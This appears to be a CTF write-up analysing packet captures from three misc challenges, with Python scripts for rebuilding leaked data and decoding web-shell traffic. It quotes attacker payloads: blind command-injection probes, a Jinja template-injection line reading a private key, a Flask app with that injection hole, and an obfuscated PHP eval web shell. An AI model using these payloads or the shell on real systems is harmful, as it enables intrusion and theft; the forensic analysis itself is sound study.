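
```python
import base64
import re
from typing import Iterable, Tuple

# Probe shape seen in the capture:
#   if [ $(cat <file>|base64 -w 0| awk NR==1 | cut -c <pos>) == '<char>' ]; then echo "rce";fi
PROBE_RE = re.compile(
    r"cat (?P<path>[^|\s]+)\|base64 -w 0\| awk NR==1 \| cut -c (?P<pos>\d+)\) == '(?P<ch>.)'"
)
SUCCESS_MARKER = "Welcome rce"


def probe(path: str, pos: int, ch: str) -> str:
    """Render one probe command exactly as it appears in the capture (used to build sample data)."""
    return 'if [ $(cat %s|base64 -w 0| awk NR==1 | cut -c %d) == %r ]; then echo "rce";fi' % (path, pos, ch)


# Constructed sample records: (command as sent, response body as returned).
_FLAG_GUESSES = "RmFrZSBGTGFnCm5vIGhlcmUK"
SAMPLE_RECORDS = [(probe("/flag", i, c), "Welcome rce\n") for i, c in enumerate(_FLAG_GUESSES, start=1)] + [
    # two wrong guesses: the template still renders, but nothing is echoed
    (probe("/flag", 1, "A"), "Welcome \n"),
    (probe("/flag", 2, "B"), "Welcome \n"),
]


def parse_probe(command: str):
    """Return (path, position, char) for a probe command, or None if it does not match."""
    m = PROBE_RE.search(command)
    if not m:
        return None
    return m.group("path"), int(m.group("pos")), m.group("ch")


def reconstruct(records: Iterable[Tuple[str, str]]):
    """Rebuild the leaked base64 per file from the probes whose response signalled success."""
    leaked = {}
    for command, response in records:
        if SUCCESS_MARKER not in response:
            continue
        parsed = parse_probe(command)
        if parsed is None:
            continue
        path, pos, ch = parsed
        leaked.setdefault(path, {})[pos] = ch
    out = {}
    for path, chars in leaked.items():
        length = max(chars)
        out[path] = {
            "b64": "".join(chars.get(p, "?") for p in range(1, length + 1)),
            "missing_positions": [p for p in range(1, length + 1) if p not in chars],
        }
    return out


def decode_leak(b64: str) -> bytes:
    """Decode a reconstructed base64 string, tolerating stripped '=' padding."""
    return base64.b64decode(b64 + "=" * (-len(b64) % 4))


if __name__ == "__main__":
    for path, info in reconstruct(SAMPLE_RECORDS).items():
        print(path, info["b64"], info["missing_positions"], decode_leak(info["b64"]))
```

Keying on the response marker rather than on the request alone is what makes this reliable: the 256 successful probes in the capture are a small subset of everything the attacker sent, and the failed guesses would otherwise corrupt the reassembly.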
Trolled, weren't we? So back to /app/secret/mw/m5 above; same extraction method, and joined together it is:
if [ $(cat /app/secret/mw/m5|base64 -w 0| awk NR==1 | cut -c 1) == 'U' ]; then echo "rce";fi
if [ $(cat /app/secret/mw/m5|base64 -w 0| awk NR==1 | cut -c 2) == 'z' ]; then echo "rce";fi
……
if [ $(cat /app/secret/mw/m5|base64 -w 0| awk NR==1 | cut -c 229) == 'P' ]; then echo "rce";fi
if [ $(cat /app/secret/mw/m5|base64 -w 0| awk NR==1 | cut -c 230) == 'Q' ]; then echo "rce";fi
if [ $(cat /app/secret/mw/m5|base64 -w 0| awk NR==1 | cut -c 231) == '=' ]; then echo "rce";fi
if [ $(cat /app/secret/mw/m5|base64 -w 0| awk NR==1 | cut -c 232) == '=' ]; then echo "rce";fi
UzBJM2lXaHZzektiT00vT2FsS1RBMGZwbTVPNWNoVlZuWUd5S2Q1blY0ZXJBelJiVjZWNnc4Yi9VaU9mUUVjM0lqaDAwaEZqWUZVMUhheE51YjlHbmxQUy9sY2FtNW1BVGtmMnNKUzZKZ3BKbzZBU2hWUnhXRFlLS3JvamVVZUJaajVNRVBJOC80REdHR3VIRnhteDJieEFhaGREZTFjR25qVFpHV09OcE5JPQ==
Base64-decode that string once:
S0I3iWhvszKbOM/OalKTA0fpm5O5chVVnYGyKd5nV4erAzRbV6V6w8b/UiOfQEc3Ijh00hFjYFU1HaxNub9GnlPS/lcam5mATkf2sJS6JgpJo6AShVRxWDYKKrojeUeBZj5MEPI8/4DGGGuHFxmx2bxAahdDe1cGnjTZGWONpNI=
Decoding it again just gives garbage, so another approach is needed.
Looking back at the earlier traffic, the attacker also read a private3.pem file:
name={{lipsum.__globals__.__builtins__.eval("__import__('os').popen('cat secret/private/private9.pem').read()")}}
-----BEGIN ENCRYPTED PRIVATE KEY-----
...
-----END ENCRYPTED PRIVATE KEY-----
This is a certificate private key. Packet 2 in the capture also handed us the application's script:
from flask import Flask, request, render_template_string, Response, session

app = Flask(__name__)
app.config['SECRET_KEY'] = 'gdkfksy05lx0nv8dl'


@app.route("/")
def index():
    return open(__file__).read()


@app.route("/rce", methods=["GET"])
def rce():
    data = request.args.get("name", "Guest")
    return render_template_string(f"Welcome {data}")


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8989, debug=False)
Decrypt the key with openssl; the passphrase is the gdkfksy05lx0nv8dl from the script above:
$ openssl rsa -in 1.pem -out 2.pem
# Enter pass phrase for 1.pem:
# writing RSA key
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----
Then use the private key on this site to obtain the RSA parameters (public and private key):
https://www.ssleye.com/ssltool/priv_get.html
With the parameters in hand, ordinary RSA decryption does it:
import base64
from Crypto.Util.number import long_to_bytes, bytes_to_long

n = 75198391834610743089994427445022622171591577121191724448299339002435832997164232218413508119298295123274196848013892501604504507367027410527023618161491726166765575077336751590544863722532358737240337140569730023629526218796143738463727597005256155751094703947322244106639054703290232743344051122409847668979
e = 65537
d = 47823271942181380918380117208311303072917059719458472058236845602980348253487465624475587910710493956741157673197903864601280854518063619685915091953443290538916965993327948549512195024615088046785300748165298087812720446099735944950660175124872626742440697531498487595767064570672468310421018941583067770553

# Base64-decode the ciphertext
c = 'S0I3iWhvszKbOM/OalKTA0fpm5O5chVVnYGyKd5nV4erAzRbV6V6w8b/UiOfQEc3Ijh00hFjYFU1HaxNub9GnlPS/lcam5mATkf2sJS6JgpJo6AShVRxWDYKKrojeUeBZj5MEPI8/4DGGGuHFxmx2bxAahdDe1cGnjTZGWONpNI='
c_decode = base64.b64decode(c)
c_decode_num = bytes_to_long(c_decode)
# Textbook RSA: m = c^d mod n
m = pow(c_decode_num, d, n)
print(long_to_bytes(m))
# b'flag{343907d2-35a3-4bfe-a5e1-5d6615157851}'
Actually it need not be that laborious; CyberChef really is the GOAT. Take the private key decrypted above, put it in CyberChef's RSA Decrypt with a From Base64 in front, and the plaintext comes straight out.
OK, finally done with this one. Challenge author, come here so I can give you a beating.
7. Weevil's Whisper
Challenge description: Bob found that his computer had been hacked. Fortunately, he was using wireshark to test packet capture before the hack. Would you please analyze the packet and find out what the hacker did
The challenge gives an archive that extracts to a capture, so as usual filter the HTTP requests first:
The first packet visits the /upload directory, and after that it is /shell1.php over and over, so the visit to /upload is most likely the upload of shell1.php. Following the stream of packet 8 confirms it; this code was uploaded:
<?php
$k = "161ebd7d";
$kh = "45089b3446ee";
$kf = "4e0d86dbcf92";
$p = "lFDu8RwONqmag5ex";

function x($t, $k) {
    $c = strlen($k);
    $l = strlen($t);
    $o = "";
    for ($i = 0; $i < $l;) {
        for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
            $o .= $t[$i] ^ $k[$j];
        }
    }
    return $o;
}

if (@preg_match("/$kh(.+)$kf/", @file_get_contents("php://input"), $m) == 1) {
    @ob_start();
    @eval(@gzuncompress(@x(@base64_decode($m[1]), $k)));
    $o = @ob_get_contents();
    @ob_end_clean();
    $r = @base64_encode(@x(@gzcompress($o), $k));
    print("$p$kh$r$kf");
}
?>
Roughly understood: what we need to look at is the value of $r, but on output the variables are all concatenated together. So first cut $r out, then base64-decode, then XOR (key 161ebd7d), then zlib-decompress.
Taking the contents of packet 21 as an example:
# 1S/#+4)~)z,kA$u45089b3446eeSaoaTMgwnyp8+PmyUlEBVwbjhcsvKhst/+ZByCoqGkz4+v42Mi3iYBpmYVfrVPxVukQ8bzC2ZC3kg3oqT20eLn145LXuUr/pZ3waqCliXjS742LXMOQclXwbHysuYx22cuReOGlkKTMUSQ4e0d86dbcf923^0(~}9G(y.l>nD"
1. First cut out $r: $p is 16 characters and $kh is 12, 28 together, so $r starts at character 29; $kf is 12 characters, so $r ends at the 13th character from the end. That gives:
SaoaTMgwnyp8+PmyUlEBVwbjhcsvKhst/+ZByCoqGkz4+v42Mi3iYBpmYVfrVPxVukQ8bzC2ZC3kg3oqT20eLn145LXuUr/pZ3waqCliXjS742LXMOQclXwbHysuYx22cuReOGlkKTMUSQ4e0d86dbcf923^0(
2. Base64-decode that string, XOR it (key: 161ebd7d) and finally zlib-decompress to get the plaintext:
try {echo(53675);}catch(Exception $e){echo "4X6l6ZERR".$e->getTrace()[0]["function"].": ".$e->getMessage()."4X6l6ZERR";}
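The three-step decode above (cut the payload out of the markers, base64-decode, repeating-key XOR, zlib-inflate) is straightforward to automate over an exported capture. Below is an added example, not code from the original post: it implements the inverse of the shell's x()/gzcompress/base64 chain with the constants from the PHP source, locates the payload between $kh and $kf with the same regex the shell itself uses (so it works for both request and response frames regardless of the random padding around them), and verifies itself against frames constructed here with a matching encoder. The plaintexts used to build the sample frames are constructed, not taken from the capture.

```python
import base64
import binascii
import re
import zlib

# Constants from the uploaded shell1.php
K = b"161ebd7d"
KH = b"45089b3446ee"
KF = b"4e0d86dbcf92"
P = b"lFDu8RwONqmag5ex"


def x(data: bytes, key: bytes) -> bytes:
    """The shell's x(): repeating-key XOR, byte by byte."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_frame(raw: bytes, kh: bytes = KH, kf: bytes = KF, key: bytes = K) -> bytes:
    """Recover the plaintext from a frame of the form <padding>KH<base64>KF<padding>.

    Mirrors the shell: preg_match("/$kh(.+)$kf/") -> base64_decode -> x() -> gzuncompress.
    """
    m = re.search(re.escape(kh) + rb"(.+?)" + re.escape(kf), raw, re.DOTALL)
    if not m:
        raise ValueError("markers not found")
    return zlib.decompress(x(base64.b64decode(m.group(1)), key))


def encode_frame(plaintext: bytes, prefix: bytes = P, kh: bytes = KH, kf: bytes = KF, key: bytes = K) -> bytes:
    """Inverse of decode_frame, used only to build constructed test frames (what print("$p$kh$r$kf") emits)."""
    return prefix + kh + base64.b64encode(x(zlib.compress(plaintext), key)) + kf


def decode_all(frames):
    """Decode a list of raw frames, flagging undecodable ones instead of aborting the run."""
    out = []
    for raw in frames:
        try:
            out.append(("ok", decode_frame(raw)))
        except (ValueError, zlib.error, binascii.Error) as e:
            out.append(("error", str(e).encode()))
    return out


# Constructed sample frames: a well-formed response, a frame with random padding on both
# sides (as the request in packet 21 has), and one that is not a shell frame at all.
SAMPLE_PLAINTEXT = b'try {echo(53675);}catch(Exception $e){echo "ERR".$e->getMessage();}'
SAMPLE_FRAMES = [
    encode_frame(SAMPLE_PLAINTEXT),
    b"1S/#+4)~)z,kA$u" + encode_frame(b"echo 1;", prefix=b"") + b"3^0(~}9G(y.l>nD",
    b"<html>not a shell frame</html>",
]


if __name__ == "__main__":
    for status, data in decode_all(SAMPLE_FRAMES):
        print(status, data)
```

Searching for the markers rather than counting fixed offsets is what keeps the request side decodable too: requests carry random padding instead of $p, so the "skip 28, drop 12" rule from the manual walkthrough only holds for responses.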
There is no clever way forward from here: export all the HTTP requests and responses and go through them one by one. In the last packet (number 287) it finally turned up (damn it, I should have worked backwards from the end):
Decoding the two halves gives:
try {chdir('C:\Applications\phpStudy\phpStudy_64\phpstudy_pro\WWW');@error_reporting(0);@system('type flag.txt 2>&1');}catch(Exception $e){echo "4X6l6ZERR".$e->getTrace()[0]["function"].": ".$e->getMessage()."4X6l6ZERR";}
flag{arsjxh-sjhxbr-3rdd78dfsh-3ndidjl}
8. find me
Challenge description: In the year 0x1337 the Nailong army invades Earth and humanity's fate hangs by a thread. At this critical moment cow contacts Lord Belial for help. The great Belial gives cow a file, and hidden in that file is the secret to saving Earth. Can you find it?!!!
Opening this thing I was completely lost, but luckily there is AI:
A Minecraft configuration file, seriously. How are old folks like us who have never played it supposed to deal with this?
After fiddling with it for ages I gave up.
For this challenge, read this article instead: https://www.cnblogs.com/Mi1kT e4/articles/18680528
flag{535e0a20-189e-4049-ab30-dec60bac91b8}
Originally published on the WeChat public account 南有禾木: 2025 Chunqiu Cup Cybersecurity League Winter Round, selected misc challenges